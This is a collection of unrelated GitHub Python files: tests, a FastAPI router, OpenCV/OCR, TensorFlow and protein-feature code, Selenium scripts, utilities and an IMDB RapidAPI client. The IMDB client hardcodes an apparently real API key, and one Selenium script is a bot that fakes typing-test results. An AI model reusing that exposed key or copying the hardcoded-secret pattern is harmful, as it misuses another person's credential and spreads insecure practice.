+{"seq_id":"21056384677","text":"#!/usr/bin/python3\nimport unittest\nimport pep8\nfrom models.square import Square\n\n\nclass testcase(unittest.TestCase):\n \"\"\"this is the class for unittest\"\"\"\n\n def test_pep8(self):\n \"\"\"pep8 test\"\"\"\n style = pep8.StyleGuide()\n res = style.check_files([\"models/square.py\"])\n self.assertEqual(res.total_errors, 0, \"pep8 error\")\n\n def test_area(self):\n \"\"\"check area\"\"\"\n s1 = Square(5)\n self.assertEqual(s1.area(), 25)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"rania3103/holbertonschool-higher_level_programming","sub_path":"python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"41915623840","text":"import json\n\nfrom fastapi import APIRouter, HTTPException, Path\nfrom pydantic import HttpUrl\n\nfrom src.api import schemas\nfrom src.utils.scrapers import newsletter_scraper\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=list[schemas.newsletter.NewsletterInfo])\ndef get_all_newsletters():\n    \"\"\"\n    Get all newsletters.\n    \"\"\"\n    return newsletter_scraper.get_all_newsletters_list()\n\n\n@router.get(\n    \"/{newsletter_name}\", response_model=list[schemas.newsletter.NewsletterData]\n)\ndef get_newsletter_by_name(\n    newsletter_name: schemas.newsletter.NewsletterName = Path(\n        ..., example=\"國立清華大學學生會電子報\", description=\"Name of the newsletter to fetch\"\n    )\n):\n    \"\"\"\n    Get the article list of a specific newsletter by its name.\n    \"\"\"\n    with open(\"data/newsletter_list.json\", \"r\", encoding=\"utf-8\") as f:\n        data = f.read()\n    data = json.loads(data)\n    newsletter_link = None\n    for newsletter in data:\n        if newsletter[\"name\"] == newsletter_name:\n            newsletter_link = newsletter[\"link\"]\n            break\n    if newsletter_link is None:\n        raise HTTPException(status_code=404, detail=\"Newsletter not found\")\n    return newsletter_scraper.get_selected_newsletter_list(newsletter_link)\n\n\n@router.get(\n    \"/paths/{newsletter_link:path}\",\n    response_model=list[schemas.newsletter.NewsletterData],\n)\ndef get_newsletter_by_link(\n    newsletter_link: HttpUrl = Path(\n        ...,\n        example=\"https://newsletter.cc.nthu.edu.tw/nthu-list/index.php/zh/home-zh-tw/listid-44-\",\n        description=\"URL of the newsletter to fetch\",\n    )\n):\n    \"\"\"\n    Get the article list of a specific newsletter by its URL.\n    \"\"\"\n    return newsletter_scraper.get_selected_newsletter_list(str(newsletter_link))\n","repo_name":"NTHU-SA/NTHU-Data-API","sub_path":"src/api/routers/newsletters.py","file_name":"newsletters.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"33404162558","text":"import cv2\nimport numpy as np\nimport pytesseract\nimport os\n\nMAX_FEATURES = 500\nGOOD_MATCH_PERCENT = 0.15\n\nclass dataReader:\n\n\n    def __init__(self, pointsOfInterest, query):\n        self.pointsOfInterest = pointsOfInterest\n        self.query = query\n        self.per = 90\n\n    def alignImages(self, im1, im2):\n\n        # Convert images to grayscale\n        im1Gray = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n        im2Gray = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)\n\n        # Detect ORB features and compute descriptors.\n        orb = cv2.ORB_create(MAX_FEATURES)\n        keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)\n        keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)\n\n        # Match features.\n        matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)\n        matches = matcher.match(descriptors1, descriptors2, None)\n\n        # Sort matches by score\n        matches.sort(key=lambda x: x.distance, reverse=False)\n\n        # Remove not so good matches\n        numGoodMatches = int(len(matches) * GOOD_MATCH_PERCENT)\n        matches = matches[:numGoodMatches]\n\n        # Draw top matches\n        imMatches = cv2.drawMatches(im1, keypoints1, im2, keypoints2, matches, None)\n        h, w, c = im1.shape\n        cv2.imshow(\"matches\", cv2.resize(imMatches,(w//2,h//2)))\n\n        # Extract location of good matches\n        points1 = np.zeros((len(matches), 2), dtype=np.float32)\n        points2 = np.zeros((len(matches), 2), dtype=np.float32)\n\n        for i, match in enumerate(matches):\n            points1[i, :] = keypoints1[match.queryIdx].pt\n            points2[i, :] = keypoints2[match.trainIdx].pt\n\n        # Find homography\n        h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)\n\n        # Use homography\n        height, width, channels = im2.shape\n\n\n        im1Reg = cv2.warpPerspective(im1, h, (width, height))\n        cv2.imwrite(\"matches.jpg\", im1Reg)\n\n        return im1Reg, h\n\n    def readData(self, image):\n        # load query\n        # ----\n\n        img1 = cv2.imread(self.query)\n\n        filestr = image.read()\n        # convert the raw bytes to a numpy array (np.fromstring is deprecated)\n        npimg = np.frombuffer(filestr, np.uint8)\n        # convert numpy array to image\n        img2 = cv2.imdecode(npimg, cv2.IMREAD_COLOR)\n\n        imgScan, asx = self.alignImages(img2, img1)\n\n        imgShow = imgScan.copy()\n\n        imgMask = np.zeros_like(imgShow)\n        subdata = {}\n\n        # points of interest\n        for x,r in enumerate(self.pointsOfInterest):\n            cv2.rectangle(imgMask,(r[0][0],r[0][1]),(r[1][0],r[1][1]),(0,255,0),cv2.FILLED)\n            imgShow = cv2.addWeighted(imgShow, 0.99, imgMask, 0.1,0)\n            imgCrop = imgScan[r[0][1]:r[1][1], r[0][0]:r[1][0]]\n\n            text = pytesseract.image_to_string(imgCrop, 'ces').strip()\n            text = str(text)\n\n            if text:\n                if r[2] == 'array':\n                    try:\n                        subdata[r[3]].append(text)\n                    except KeyError:\n                        subdata[r[3]] = []\n                        subdata[r[3]].append(text)\n                else:\n                    subdata[r[3]] = text\n\n        return subdata\n","repo_name":"ondrakubicek/formReader","sub_path":"src/dataReader/dataReader.py","file_name":"dataReader.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"20256308707","text":"import tensorflow as tf\n\nclass MidLevelFeatNet(tf.keras.layers.Layer):\n \"\"\"\n This class represents the Mid-Level Features Network which extracts local mid-level features\n from the low-level features and passes them to the Fusion Layer.\n \"\"\"\n\n def __init__(self, **kwargs): \n super(MidLevelFeatNet, self).__init__(**kwargs)\n self.net_layers = []\n self.net_layers.append(tf.keras.layers.Conv2D(filters=512, kernel_size=(3,3), strides=(1,1), padding='same'))\n self.net_layers.append(tf.keras.layers.Activation(tf.nn.relu))\n self.net_layers.append(tf.keras.layers.BatchNormalization())\n self.net_layers.append(tf.keras.layers.Conv2D(filters=256, kernel_size=(3,3), strides=(1,1), padding='same'))\n self.net_layers.append(tf.keras.layers.Activation(tf.nn.relu))\n self.net_layers.append(tf.keras.layers.BatchNormalization())\n\n @tf.function\n def call(self, x, training=False):\n for layer in self.net_layers:\n x = layer(x, training=training)\n return x\n\n def get_config(self):\n config = super(MidLevelFeatNet, self).get_config()\n return config\n \n @classmethod\n def from_config(cls, config):\n return cls(**config)","repo_name":"stmeinert/Recolorization_IANN","sub_path":"src/iizuka/mid_level_features_network.py","file_name":"mid_level_features_network.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"22314699399","text":"\"\"\"\nFunctions to compute features for ligand and protein backbone graphs.\n\"\"\"\nimport numpy as np\nfrom rdkit import Chem\nfrom typing import List, Tuple, Dict, Union, Set, Any\nfrom Bio.PDB.Residue import Residue\nfrom Bio.PDB.DSSP import dssp_dict_from_pdb_file\n\nfrom holoprot.feat import SECONDARY_STRUCTS, AMINO_ACIDS, ATOM_LIST\nfrom holoprot.feat import IMP_VALENCE, EXP_VALENCE, DEGREES, ATOM_FDIM\nfrom holoprot.feat import BOND_FDIM, BOND_TYPES\n\nidxfunc = lambda a: a.GetAtomMapNum() - 1\nbond_idx_fn = lambda a, b, mol: mol.GetBondBetweenAtoms(a.GetIdx(), b.GetIdx()).GetIdx()\n\nclass ResidueProp(object):\n    \"\"\"Wrapper class that holds all attributes of a protein residue.\"\"\"\n\n    def __init__(self,\n                 residue: Residue,\n                 sec: str,\n                 sas: float,\n                 hydrophobicity: float,\n                 res_depth: float = None,\n                 ca_depth: float = None) -> None:\n        \"\"\"\n        Parameters\n        ----------\n        residue: Residue,\n            Instance of the Bio.PDB.Residue.Residue\n        sec: str,\n            Single letter indicating the secondary structure. Refer SECONDARY_STRUCTS\n            above for possible codes.\n        sas: float,\n            Solvent accessible surface area (TODO: (vsomnath): Normalize?)\n        res_depth: float,\n            Depth of residue, calculated as average depth of all atoms\n        ca_depth: float,\n            Depth of Calpha atom of the residue\n        \"\"\"\n        self.name = residue.get_resname()\n        self.sec = sec\n        self.sas = sas\n        self.res_depth = res_depth\n        self.ca_depth = ca_depth\n        self.hydrophobicity = hydrophobicity # Hydrophobicity using the Kyte-Doolittle scale\n\n\nclass AtomProp(object):\n    \"\"\"Wrapper class that holds all properties of an atom.\"\"\"\n\n    def __init__(self, atom: Chem.Atom) -> None:\n        \"\"\"\n        Parameters\n        ----------\n        atom: Chem.Atom,\n            Instance of rdkit.Chem.Atom\n        \"\"\"\n        self.symbol = atom.GetSymbol()\n        self.degree = atom.GetDegree()\n        self.exp_valence = atom.GetExplicitValence()\n        self.imp_valence = atom.GetImplicitValence()\n        self.is_aromatic = atom.GetIsAromatic()\n\n\nclass BondProp(object):\n    \"\"\"Wrapper class that holds all properties of a bond.\"\"\"\n\n    def __init__(self, bond: Chem.Bond) -> None:\n        \"\"\"\n        Parameters\n        ----------\n        bond: Chem.Bond,\n            Instance of rdkit.Chem.Bond\n        \"\"\"\n        self.bond_type = bond.GetBondType()\n        self.is_conj = bond.GetIsConjugated()\n        self.is_ring = bond.IsInRing()\n\n\ndef onek_encoding_unk(x: Any, allowable_set: Union[List, Set]) -> List:\n    \"\"\"Converts x to one hot encoding.\n\n    Parameters\n    ----------\n    x: Any,\n        An element of any type\n    allowable_set: Union[List, Set]\n        Allowable element collection\n\n    Returns\n    -------\n    list, indicating the one hot encoding of x in allowable_set\n    \"\"\"\n    if x not in allowable_set:\n        x = allowable_set[-1]\n    return list(map(lambda s: float(x == s), allowable_set))\n\n\ndef get_atom_features(atom_prop: AtomProp, **kwargs) -> np.ndarray:\n    \"\"\"\n    Get atom features. 
The atom features computed are one-hot encodings of the atom's symbol,\n    degree, and explicit and implicit valence, plus an aromaticity flag.\n\n    Parameters\n    ----------\n    atom_prop: AtomProp,\n        Wrapped properties of an RDKit atom\n\n    Returns\n    -------\n    atom_features: np.ndarray,\n        Array of atom features\n    \"\"\"\n    if atom_prop == \"*\":\n        return np.array([0] * ATOM_FDIM)\n    atom_features = np.array(\n        onek_encoding_unk(atom_prop.symbol, ATOM_LIST) +\n        onek_encoding_unk(atom_prop.degree, DEGREES) +\n        onek_encoding_unk(atom_prop.exp_valence, EXP_VALENCE) +\n        onek_encoding_unk(atom_prop.imp_valence, IMP_VALENCE) +\n        [float(atom_prop.is_aromatic)])\n    return atom_features\n\n\ndef get_bond_features(bond_prop: BondProp, **kwargs) -> np.ndarray:\n    \"\"\"\n    Get bond features. Features computed are a one hot encoding of the bond type,\n    its aromaticity and ring membership.\n\n    Parameters\n    ----------\n    bond_prop: BondProp,\n        Wrapped properties of an RDKit bond\n\n    Returns\n    -------\n    bond_features: np.ndarray,\n        Array of bond features\n    \"\"\"\n    if bond_prop == \"*\":\n        return np.array([0] * BOND_FDIM)\n    bt = bond_prop.bond_type\n    bond_features = [float(bt == bond_type) for bond_type in BOND_TYPES[1:]]\n    bond_features.extend([float(bond_prop.is_conj), float(bond_prop.is_ring)])\n    bond_features = np.array(bond_features, dtype=np.float32)\n    return bond_features\n\n\ndef get_residue_features(residue_prop: ResidueProp,\n                         use_depth: bool = False,\n                         **kwargs) -> np.ndarray:\n    \"\"\"Get residue features.\n\n    Parameters\n    ----------\n    residue_prop: ResidueProp\n        Instance of the ResidueProp class that captures properties of a residue\n\n    Returns\n    -------\n    res_features: np.ndarray,\n        Array of residue features\n    \"\"\"\n    if residue_prop == \"*\":\n        if use_depth:\n            return np.array(\n                [0] * (len(AMINO_ACIDS) + len(SECONDARY_STRUCTS) + 4))\n        else:\n            return np.array(\n                [0] * (len(AMINO_ACIDS) + len(SECONDARY_STRUCTS) + 2))\n    res_features = onek_encoding_unk(residue_prop.name, AMINO_ACIDS) + \\\n        onek_encoding_unk(residue_prop.sec.upper(), SECONDARY_STRUCTS) + \\\n        [residue_prop.sas, residue_prop.hydrophobicity]\n    if use_depth:\n        res_features.extend([residue_prop.res_depth, residue_prop.ca_depth])\n    res_features = np.array(res_features)\n    return res_features\n\n\ndef compute_normal(residue: Residue) -> np.ndarray:\n    \"\"\"\n    Compute the normal vector for a given residue. The normal vector is estimated\n    as the cross product of the vectors formed by the difference of Calpha, C and\n    O coordinates. The normal vector is length normalized to get a unit vector.\n\n    Parameters\n    ----------\n    residue: Residue,\n        Residue for which we want to compute normal\n\n    Returns\n    -------\n    normal: np.ndarray,\n        The normal vector for the residue\n    \"\"\"\n    x_ca = residue['CA'].get_coord()\n    x_c = residue['C'].get_coord()\n    x_o = residue['O'].get_coord()\n    x_oc = x_o - x_c\n    x_cac = x_ca - x_c\n    normal = np.cross(x_oc, x_cac)\n    normal /= (np.sqrt(np.sum(normal**2) + 1e-8)) # Normalize by length\n    return normal\n\n\ndef compute_angle(residue_pair: Tuple[Residue]) -> float:\n    \"\"\"\n    Compute the angle between two residues. The angle is estimated as the cosine\n    inverse of the dot product between the normal vectors of the two residues. 
The\n    angle is normalized by dividing it by 2 * \pi\n\n    Parameters\n    ----------\n    residue_pair: Tuple[Residue]\n        The pair of residues between which we want to estimate the angle.\n\n    Returns\n    -------\n    normalized angle (float) between the residues\n    \"\"\"\n    res_i, res_j = residue_pair\n    norm_i = compute_normal(res_i)\n    norm_j = compute_normal(res_j)\n\n    angle = np.arccos(norm_i.dot(norm_j))\n    return angle / (2 * np.pi)\n\n\ndef get_contact_features(residue_pair: Tuple[Residue],\n                         mode: str = 'ca',\n                         sigma: float = 0.01,\n                         **kwargs) -> np.ndarray:\n    \"\"\"\n    Gets contact features. The features computed are the RBF kernel over the\n    distance between residues and the angle between the residues. The RBF kernel's\n    width is modulated by the parameter `sigma`, and the mode to compute distance\n    is controlled by `mode` argument.\n\n    Parameters\n    ----------\n    residue_pair: Tuple[Residue],\n        The pair of residues forming the contact.\n    mode: str, (default ca)\n        Compute distance between two residues. Allowed options are\n        `ca` (distance between calpha atoms) and `com` (distance between\n        center of masses of residues)\n    sigma: float\n        Width of the gaussian kernel over the contact.\n\n    Returns\n    -------\n    edge_features: np.ndarray,\n        Features of the contact between residues\n    \"\"\"\n    if residue_pair == \"*\":\n        return np.array([0, 0])\n\n    res_i, res_j = residue_pair\n    if mode == 'ca':\n        coord_i = res_i['CA'].get_coord()\n        coord_j = res_j['CA'].get_coord()\n\n    elif mode == 'com':\n        coord_i = np.mean(\n            [atom.get_coord() for atom in res_i.get_list()], axis=0)\n        coord_j = np.mean(\n            [atom.get_coord() for atom in res_j.get_list()], axis=0)\n\n    else:\n        raise ValueError(\n            f\"Computing distance with mode {mode} is not supported.\")\n\n    y = coord_i - coord_j\n    dist = np.exp(-np.sum(y**2) / sigma**2)\n    angle = compute_angle(residue_pair)\n\n    edge_features = np.array([dist, angle])\n    return edge_features\n\n\ndef get_secondary_struct_features(pdb_file: str,\n                                  dssp_bin: str = 'dssp') -> Dict[str, List]:\n    \"\"\"Compute secondary structure features for the protein using DSSP.\n\n    Parameters\n    ----------\n    pdb_file: str,\n        PDB file for the protein.\n    dssp_bin: str,\n        Path to the DSSP binary executable\n\n    Returns\n    -------\n    dssp_dict: Dict[str, List]\n        Dictionary containing the secondary structure features for residues\n    \"\"\"\n    dssp_dict = dssp_dict_from_pdb_file(pdb_file, DSSP=dssp_bin)[0]\n    return dssp_dict","repo_name":"vsomnath/holoprot","sub_path":"holoprot/feat/complex.py","file_name":"complex.py","file_ext":"py","file_size_in_byte":9298,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"35"}
+{"seq_id":"29526546357","text":"import requests\nimport json\n\n\n\nHOST_NAME = \"imdb8.p.rapidapi.com\"\nAPI_KEY = \"1a0ac83834mshc4bf97497c9d5a6p1a373ejsn14e832e9607e\"\n\ndef get_movie_id(movie_name):\n    '''\n    Gets the id of a movie which can be used to get info from IMDB rapidAPI about that movie\n    \n    Parameters:\n    movie_name(String): The name of a movie\n    Returns:\n    \n    String\n    The id of a movie used in IMDB api (eg. 'tt1049413')\n    \n    '''\n    url = \"https://imdb8.p.rapidapi.com/title/find\"\n    \n    querystring = {\"q\":movie_name}\n    \n    headers = {\n        'x-rapidapi-host': HOST_NAME,\n        'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    data = response.json()\n    data = data[\"results\"][0][\"id\"]\n    return(data[7:-1])\n\n#print(get_movie_id(\"Up\"))\n#/title/tt0110912/\n\n\ndef get_plot_overview(movie_id):\n    '''\n    Gets the plot overview of a movie from IMDB rapidAPI \n    \n    Parameters:\n    movie_id(String): The id of a movie\n    Returns:\n    \n    String\n    The plot overview of a movie \n    \n    '''\n    url = \"https://imdb8.p.rapidapi.com/title/get-overview-details\"\n    # get the id of given movie\n    #movie_id = get_movie_id(movie_id)\n    querystring = {\"tconst\":movie_id,\"currentCountry\":\"US\"}\n\n    #print(movie_id)\n    headers = {\n        'x-rapidapi-host': HOST_NAME,\n        'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    plot_overview = response.json()\n    #print(plot_overview)\n    plot_overview = plot_overview[\"plotSummary\"][\"text\"]\n    return (plot_overview)\n\n#print(get_plot_overview(\"tt0110912\"))\n\ndef get_top_100():\n    '''\n    Gets the top 100 IMDB movies from IMDB rapidAPI \n    \n    Parameters:\n    None\n    Returns:\n    \n    List\n    A list of 100 strings of movie IDs \n    \n    '''\n    url = \"https://imdb8.p.rapidapi.com/title/get-most-popular-movies\"\n    \n    querystring = {\"purchaseCountry\":\"US\",\"homeCountry\":\"US\",\"currentCountry\":\"US\"}\n    \n    headers = {\n        'x-rapidapi-host': HOST_NAME,\n        'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    response = response.json()\n    top_100_id = []\n    for i in response:\n        top_100_id.append(i[7:-1])\n    return(top_100_id)\n    \n#print(get_top_100())\n\ndef get_short_plot(movie_id):\n    '''\n    Gets a short plot summary of a movie from IMDB rapidAPI \n    \n    Parameters:\n    movie_id(String): The id of a movie\n    Returns:\n    \n    String\n    A short plot overview of a movie \n    \n    '''\n    url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n    \n    querystring = {\"tconst\":movie_id}\n    \n    headers = {\n        'x-rapidapi-host': HOST_NAME,\n        'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    response = response.json()\n    plot = response[\"plots\"][0][\"text\"]\n    return(plot)\n    \n#print(get_short_plot(\"tt0110912\"))\n\ndef get_medium_plot(movie_id):\n    '''\n    Gets a medium-length plot summary of a movie from IMDB rapidAPI \n    \n    Parameters:\n    movie_id(String): The id of a movie\n    Returns:\n    \n    String\n    A medium-length plot overview of a movie \n    \n    '''\n    url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n    \n    querystring = {\"tconst\":movie_id}\n    \n    headers = {\n        'x-rapidapi-host': HOST_NAME,\n        'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    response = response.json()\n    plot = 
response[\"plots\"][1][\"text\"]\n return(plot)\n \n#print(get_medium_plot(\"tt0110912\"))\n#\n#def get_long_plot(movie_id):\n# url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n# \n# querystring = {\"tconst\":movie_id}\n# \n# headers = {\n# 'x-rapidapi-host': HOST_NAME,\n# 'x-rapidapi-key': API_KEY\n# }\n# \n# response = requests.request(\"GET\", url, headers=headers, params=querystring)\n# response = response.json()\n# plot = response[\"plots\"][2][\"text\"]\n# return(plot)\n# \n#print(get_long_plot(\"tt0110912\"))\n\ndef get_movie_year(movie_id):\n '''\n Gets the year of release of a movie from IMDB rapidAPI \n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n Integer\n The year of a movie\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_year = response[\"year\"]\n \n return(movie_year)\n\n#print(get_movie_year(\"tt0110912\"))\n\n\ndef get_movie_title(movie_id):\n '''\n Gets the title of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The title of a movie\n \n '''\n \n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_title = response[\"title\"]\n \n return(movie_title)\n\n#print(get_movie_title(\"tt0110912\"))\n\ndef get_movie_details(movie_id):\n '''\n Gets all details of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n JSON\n JSON list containing movie title, id, image URL, image width, running time in minutes, title, title type and year\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n movie_details = response.json()\n #movie_title = response[\"title\"]\n \n return(movie_details)\n \n#print(get_movie_details(\"tt0110912\"))\n\ndef get_running_time(movie_id):\n '''\n Gets the running time of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The running time in minutes of a movie\n \n '''\n \n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_running_time = response[\"runningTimeInMinutes\"]\n \n return(movie_running_time)\n\n#print(get_running_time(\"tt0110912\"))\n\ndef get_poster_url(movie_id):\n '''\n Gets the URL which contains the poster of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The URL of a movie poster\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = 
requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n poster_url = response[\"image\"][\"url\"]\n \n return(poster_url)\n\n#print(get_poster_url(\"tt0110912\"))\n\n\n##NOT WORKING!!!\ndef get_actor_pic_url(actor_id):\n '''\n Gets the URL of an actor from IMDB rapidAPI from it's ID\n \n Parameters:\n actor_id(String): The id of an actor\n Returns:\n \n String\n The URL of a picture of an actor\n \n '''\n url = \"https://imdb8.p.rapidapi.com/actors/get-bio\"\n\n querystring = {\"nconst\":actor_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n actor_pic_url = response[\"image\"][\"url\"]\n \n return(actor_pic_url)\n\n#print(get_actor_pic_url(\"nm0001667\"))\n","repo_name":"karlgospel/IMDB_Movie_API","sub_path":"api_movies.py","file_name":"api_movies.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"19933078224","text":"#encoding:utf-8\n\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\ndriver_path = r\"C:\\www\\chromedriver\\chromedriver.exe\"\n\ndriver = webdriver.Chrome(executable_path=driver_path)\ndriver.get(\"https://www.baidu.com/\")\ninputTag = driver.find_element_by_id('kw')\nsubTag = driver.find_element_by_id('su')\n\nactions = ActionChains(driver)\n# give the input box focus\nactions.move_to_element(inputTag)\nactions.send_keys_to_element(inputTag,'苍老师现在怎么样了')\nactions.move_to_element(subTag)\nactions.click(subTag)\n\nactions.perform()","repo_name":"gaohj/szpython_1812","sub_path":"day6/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"36946542857","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common import keys\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.common.exceptions import NoSuchElementException\r\n\r\n\r\ndriver = webdriver.Chrome('C:\\\\webdrivers\\\\chromedriver.exe')\r\ndriver.get('https://www.speedtypingonline.com/typing-test')\r\n \r\nfor j in range(1, 10000000):\r\n for i in range(0, 4):\r\n for k in range(1, 1000): \r\n try:\r\n toSend = driver.find_element_by_xpath('//*[@id=\"blockLine'+str(i)+'\"]/span['+str(k)+']').text\r\n except NoSuchElementException:\r\n break\r\n\r\n if(toSend == ' '):\r\n toSend = ' '\r\n actions = ActionChains(driver)\r\n actions.send_keys(toSend)\r\n actions.perform()\r\n \r\n","repo_name":"Zachariah-Abraham/speedtypingonline_bot","sub_path":"ST.py","file_name":"ST.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"8410000657","text":"#!/usr/bin/python3\n#-*-coding:utf-8-*-\n\n__all__ = ['log', 'filehash', 'filetime', 'pathmake']\n\nimport os\nimport time\nimport socket\nimport hashlib\nimport threading\nimport uuid\n\n'''Unified log output'''\ntlock = threading.Lock()\ndef log(txt):\n    tlock.acquire()\n    print(\"\" + time.strftime('%Y-%m-%d %H:%M:%S') + \" \" + format(txt))\n    tlock.release()\n\n'''Compute the SHA-1 hash of a file'''\ndef filehash(fp):\n    if not os.path.isfile(fp):\n        return ''\n    \n    while True:\n        try:\n            f = open(fp, 'rb')\n        except PermissionError:\n            time.sleep(1)\n            continue\n        else:\n            break\n    \n    hh = hashlib.sha1()\n    while True:\n        b = f.read(8096)\n        if not b:\n            break\n        hh.update(b)\n    f.close()\n    return hh.hexdigest()\n\n\n'''Check whether a file is complete'''\n'''\ndef fileover(fp):\n    # if the file size is still changing, wait a bit (PermissionError)\n    s1, s2 = 0, 1\n    while s1 != s2:\n        print(s1)\n        s1 = os.stat(fp).st_size\n        time.sleep(1)\n        s2 = os.stat(fp).st_size\n    return s1\nfileover(r'D:\\shell\\test\\Y470Y470PY570_WIN7x64.exe')\n'''\n \n'''Recursively move a file or directory without raising'''\n'''def surechange(path):\n    pass'''\n\n'''Recursively delete a file or directory without raising'''\n'''def suredelete(path):\n    pass'''\n\n'''Recursively create directories without raising'''\n'''def surecreate(path, fp=None):\n    try:\n        os.makedirs(path)\n    except FileExistsError:\n        pass\n    return True'''\n\n'''\nGet a human-readable file size\nB/KB/MB/GB/TB/PB/EB/ZB/YB/BB\n'''\ndef getsize(byte, assoc=False):\n    assert byte >=0\n    size, unit = (0, 'B')\n    if byte < 1024:\n        size, unit = (byte, 'B')\n    elif byte/1024 < 1024 :\n        size, unit = (byte/1024, 'KB')\n    elif byte/1048576 < 1024 :\n        size, unit = (byte/1024/1024, 'MB')\n    elif byte/1073741824 <= 1024 :\n        size, unit = (byte/1024/1024/1024, 'GB')\n    elif byte / 1099511627776 <= 1024 :\n        size, unit = (byte/1024/1024/1024/1024, 'TB')\n    else:\n        size, unit = (byte/1125899906842624, 'PB')\n\n    if assoc == True:\n        return (size, unit)\n\n    return '%.2f %s'%(size, unit)\n\n\ndef getname():\n    return socket.getfqdn(socket.gethostname())\n\ndef getip(ifname='lo', ipv6=False):\n    # loopback lookup: LAN IP\n    return socket.gethostbyname(socket.getfqdn(socket.gethostname()))\n    \n    # host address: metro-network (public) IP\n    '''import fcntl, struct\n    skt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    inet = fcntl.ioctl(skt.fileno(), 0x8915, struct.pack('256s',ifname[:15]))\n    return socket.inet_ntoa(inet[20:24])'''\n\ndef getmac(sep='-'):\n    mac = uuid.UUID(int=uuid.getnode()).hex[-12:]\n    return sep.join([mac[e:e+2] for e in range(0,11,2)]).upper()\n\n\n'''Generate a unique identifier for the current machine from the host ID and sequence number'''\ndef computer():\n    return str(uuid.uuid1())\n\n'''Generate a random UUID'''\ndef uniqid():\n    return str(uuid.uuid4().hex)\n\n \nif __name__ == '__main__':\n    log(\"RUN:\")\n    log(filehash('utils.py'))\n\n\n    #surechange(r'D:\\shell\\test\\dd')\n    #suredelete(r'D:\\shell\\test\\dd')\n    #surecreate(r'D:\\shell\\test\\dd')\n\n    print(getsize(1024))\n    print(getsize(1048576))\n    print(getsize(1073741824))\n    print(getsize(1099511627776))\n\n\n    print(getname())\n    print(getip())\n    print(getmac())\n\n    print(computer())\n    